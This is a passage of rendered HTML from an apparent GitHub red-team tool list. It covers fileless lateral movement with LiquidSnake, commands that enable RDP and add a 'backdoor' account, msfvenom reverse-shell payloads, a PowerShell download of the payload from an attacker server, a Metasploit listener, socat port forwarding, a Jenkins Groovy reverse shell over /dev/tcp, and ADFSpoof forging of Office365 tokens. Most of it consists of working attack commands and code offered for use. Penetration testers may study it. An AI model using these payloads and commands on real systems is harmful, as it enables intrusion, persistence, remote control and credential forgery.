href=\"https://github.com/RiccardoAncarani/LiquidSnake\"\u003eLiquidSnake\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-liquidsnake\" class=\"anchor\" aria-label=\"Permalink: 🔙LiquidSnake\" href=\"#liquidsnake\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLiquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe project is composed by two separate solutions:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eCSharpNamedPipeLoader\u003c/code\u003e - the component that will be transformed in VBS via GadgetToJScript\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eLiquidSnake\u003c/code\u003e - the component responsible to creating the WMI Event Subscription on the remote system\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen both solutions in Visual Studio 
and build. \u003cem\u003eMake sure to target x64 architecture for the \u003ccode\u003eCSharpNamedPipeLoader\u003c/code\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOutput: Two separate EXEs: \u003ccode\u003eCSharpNamedPipeLoader.exe\u003c/code\u003e and \u003ccode\u003eLiquidSnake.exe\u003c/code\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull build information can be found \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake#building\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUse \u003ccode\u003eLiquidSnake.exe\u003c/code\u003e against a host over which you already have administrative access, as follows:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"LiquidSnake.exe \u0026lt;host\u0026gt; [\u0026lt;username\u0026gt; \u0026lt;password\u0026gt; \u0026lt;domain\u0026gt;]\nLiquidSnake.exe dc01.isengard.local\nLiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local\"\u003e\u003cpre\u003eLiquidSnake.exe \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ehost\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eusername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003epassword\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\nLiquidSnake.exe dc01.isengard.local\nLiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e Without the optional credentials the tool authenticates as the user running it, and a password given on the command line is visible in process listings on your own host. The tool creates a WMI event filter, consumer and binding on the target (see the output below); WMI event subscriptions are a well-known persistence mechanism and survive reboots, so confirm they have been removed from the target once the shellcode has run.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf everything went fine, you should obtain output similar to the following:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate 
position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"[*] Event filter created.\n[*] Event consumer created.\n[*] Subscription created, now sleeping\n[*] Sending some DCOM love..\n[*] Sleeping again... long day\"\u003e\u003cpre\u003e[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Event filter created.\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Event consumer created.\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Subscription created, now sleeping\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Sending some DCOM love..\n[\u003cspan class=\"pl-k\"\u003e*\u003c/span\u003e] Sleeping again... long day\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGeneral usage information can be found \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull \u003ccode\u003eLiquidSnake\u003c/code\u003e usage information can be found \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg\" alt=\"LiquidSnake\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/RiccardoAncarani/LiquidSnake#usage\"\u003ehttps://github.com/RiccardoAncarani/LiquidSnake#usage\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eEnabling RDP\u003c/h3\u003e\u003ca id=\"user-content-enabling-rdp\" class=\"anchor\" 
aria-label=\"Permalink: 🔙Enabling RDP\" href=\"#enabling-rdp\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg add \u0026quot;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u0026quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f\nnetsh advfirewall firewall set rule group=\u0026quot;remote desktop\u0026quot; new enable=Yes\nnet localgroup \u0026quot;Remote Desktop Users\u0026quot; \u0026quot;backdoor\u0026quot; /add\"\u003e\u003cpre\u003ereg add \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e /v fDenyTSConnections /t REG_DWORD /d 0 /f\nnetsh advfirewall firewall \u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e rule group=\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eremote desktop\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e new enable=Yes\nnet localgroup \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eRemote Desktop Users\u003cspan 
class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ebackdoor\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e /add\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e All three commands need local administrator rights and make persistent changes to the host: RDP stays enabled, the firewall rule group stays open and the account (here \u003ccode\u003ebackdoor\u003c/code\u003e, which must already exist) stays in \u003ccode\u003eRemote Desktop Users\u003c/code\u003e until someone reverts them. Record each change and undo it at the end of the engagement (\u003ccode\u003e/d 1\u003c/code\u003e, \u003ccode\u003enew enable=No\u003c/code\u003e, \u003ccode\u003e/delete\u003c/code\u003e).\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eUpgrading shell to meterpreter\u003c/h3\u003e\u003ca id=\"user-content-upgrading-shell-to-meterpreter\" class=\"anchor\" aria-label=\"Permalink: 🔙Upgrading shell to meterpreter\" href=\"#upgrading-shell-to-meterpreter\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eShells (\u003ca href=\"https://infinitelogins.com/tag/payloads/\" rel=\"nofollow\"\u003ehttps://infinitelogins.com/tag/payloads/\u003c/a\u003e)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAfter getting basic shell access to an endpoint, upgrading it to a Meterpreter session gives you a much richer post-exploitation toolset to continue with.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[attacker]\u003c/strong\u003e Generate a meterpreter shell:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p 
windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f elf \u0026gt; shell-x86.elf\"\u003e\u003cpre\u003emsfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f elf \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell-x86.elf\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003ccode\u003e--encoder x86/shikata_ga_nai\u003c/code\u003e only changes the bytes of the payload, not its behaviour, and it is heavily signatured; do not rely on it for AV evasion. The second command produces a staged Linux \u003cem\u003eshell\u003c/em\u003e, not a Meterpreter, so whichever payload you generate, the \u003ccode\u003ePAYLOAD\u003c/code\u003e set on the handler below must match it exactly (\u003ccode\u003elinux/x86/shell/reverse_tcp\u003c/code\u003e for the ELF).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[victim]\u003c/strong\u003e Download to victim endpoint (the file is fetched over plain HTTP from port 8000 on the attacker, e.g. \u003ccode\u003epython3 -m http.server 8000\u003c/code\u003e run in the directory holding the payload):\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"powershell \u0026quot;(New-Object System.Net.WebClient).Downloadfile('http://\u0026lt;ip\u0026gt;:8000/shell-name.exe','shell-name.exe')\u0026quot;\"\u003e\u003cpre\u003epowershell \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e(New-Object System.Net.WebClient).Downloadfile('http://\u0026lt;ip\u0026gt;:8000/shell-name.exe','shell-name.exe')\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[attacker]\u003c/strong\u003e Configure listener (\u003ccode\u003erun\u003c/code\u003e must be its own command, otherwise it becomes part of the \u003ccode\u003eLPORT\u003c/code\u003e value):\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST your-ip\nset LPORT listening-port\nrun\"\u003e\u003cpre\u003euse exploit/multi/handler\n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e PAYLOAD windows/meterpreter/reverse_tcp\n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LHOST your-ip\n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LPORT listening-port\nrun\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003e[victim]\u003c/strong\u003e Execute payload:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Start-Process \u0026quot;shell-name.exe\u0026quot;\"\u003e\u003cpre\u003eStart-Process \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eshell-name.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" 
dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eForwarding Ports\u003c/h3\u003e\u003ca id=\"user-content-forwarding-ports\" class=\"anchor\" aria-label=\"Permalink: 🔙Forwarding Ports\" href=\"#forwarding-ports\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSometimes, after gaining access to an endpoint there are local ports. 
Exposing such a localhost-only service on an externally reachable port lets you reach it from the attacker machine, which helps with lateral movement to other services on the host.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 \u0026amp;\nsocat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT \u0026amp;\"\u003e\u003cpre\u003esocat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 \u003cspan class=\"pl-k\"\u003e\u0026amp;\u003c/span\u003e\nsocat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT \u003cspan class=\"pl-k\"\u003e\u0026amp;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003ccode\u003eTCP-LISTEN\u003c/code\u003e binds on all interfaces and adds no authentication, so anyone who can reach \u003ccode\u003eEXTERNAL_PORT\u003c/code\u003e now has the same access to the internal service that you do. Restrict it to the address you will connect from (\u003ccode\u003eTCP-LISTEN:8888,bind=\u0026lt;ip\u0026gt;,fork\u003c/code\u003e) or with a host firewall rule, and kill the backgrounded socat process when you are done. socat is usually not installed on the target; a SOCKS or port-forward through your existing session (e.g. Meterpreter \u003ccode\u003eportfwd\u003c/code\u003e) avoids dropping a new binary on the host.\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eJenkins reverse shell\u003c/h3\u003e\u003ca id=\"user-content-jenkins-reverse-shell\" class=\"anchor\" aria-label=\"Permalink: 🔙Jenkins reverse shell\" href=\"#jenkins-reverse-shell\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eIf you gain access to a Jenkins script console you can use the Groovy below to get a reverse shell on the host that executes the script (the controller by default), running as the Jenkins service account. It needs \u003ccode\u003e/bin/bash\u003c/code\u003e on that host, so it is Linux-only as written.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate 
position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"r = Runtime.getRuntime()\np = r.exec([\u0026quot;/bin/bash\u0026quot;,\u0026quot;-c\u0026quot;,\u0026quot;exec 5\u0026lt;\u0026gt;/dev/tcp/IP_ADDRESS/PORT;cat \u0026lt;\u0026amp;5 | while read line; do \\$line 2\u0026gt;\u0026amp;5 \u0026gt;\u0026amp;5; done\u0026quot;] as String[])\np.waitFor()\"\u003e\u003cpre lang=\"jenkins\" class=\"notranslate\"\u003e\u003ccode\u003er = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u0026lt;\u0026gt;/dev/tcp/IP_ADDRESS/PORT;cat \u0026lt;\u0026amp;5 | while read line; do \\$line 2\u0026gt;\u0026amp;5 \u0026gt;\u0026amp;5; done\"] as String[])\np.waitFor()\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mandiant/ADFSpoof\"\u003eADFSpoof\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adfspoof\" class=\"anchor\" aria-label=\"Permalink: 🔙ADFSpoof\" href=\"#adfspoof\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCreated by Doug Bienstock \u003ca href=\"https://twitter.com/doughsec\" 
rel=\"nofollow\"\u003e@doughsec\u003c/a\u003e while at Mandiant FireEye.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eADFSpoof has two main functions:\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eGiven the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.\u003c/li\u003e\n\u003cli\u003eGiven a signing key, produce a signed security token that can be used to access a federated application.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003eThis tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eADFSpoof requires the installation of a custom fork of the Python Cryptography package, available \u003ca href=\"https://github.com/dmb2168/cryptography\"\u003ehere\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/mandiant/ADFSpoof\npip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/mandiant/ADFSpoof\npip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Decrypt the EncryptedPFX and write to disk\npython ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump\n\n# Generate a security token for Office365\npython ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid 
{1C1D4BA4-B513-XXX-XXX-3308B907D759\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Decrypt the EncryptedPFX and write to disk\u003c/span\u003e\npython ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate a security token for Office365\u003c/span\u003e\npython ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/mandiant/ADFSpoof#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAdditional command examples can be found \u003ca href=\"https://github.com/mandiant/ADFSpoof#examples\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/mandiant/ADFSpoof#usage\"\u003ehttps://github.com/mandiant/ADFSpoof#usage\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/p0dalirius/Coercer\"\u003eCoercer\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-coercer\" class=\"anchor\" aria-label=\"Permalink: 🔙Coercer\" href=\"#coercer\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" 
